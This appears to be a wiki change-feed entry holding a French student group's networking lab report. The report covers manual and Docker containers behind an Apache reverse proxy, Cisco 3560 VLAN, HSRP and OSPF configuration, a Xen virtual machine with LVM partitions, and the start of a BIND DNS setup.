		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Ping_dionysos_r1.png&amp;diff=49083</id>
		<title>Fichier:Ping dionysos r1.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Ping_dionysos_r1.png&amp;diff=49083"/>
				<updated>2018-12-21T14:46:35Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49082</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49082"/>
				<updated>2018-12-21T14:42:07Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
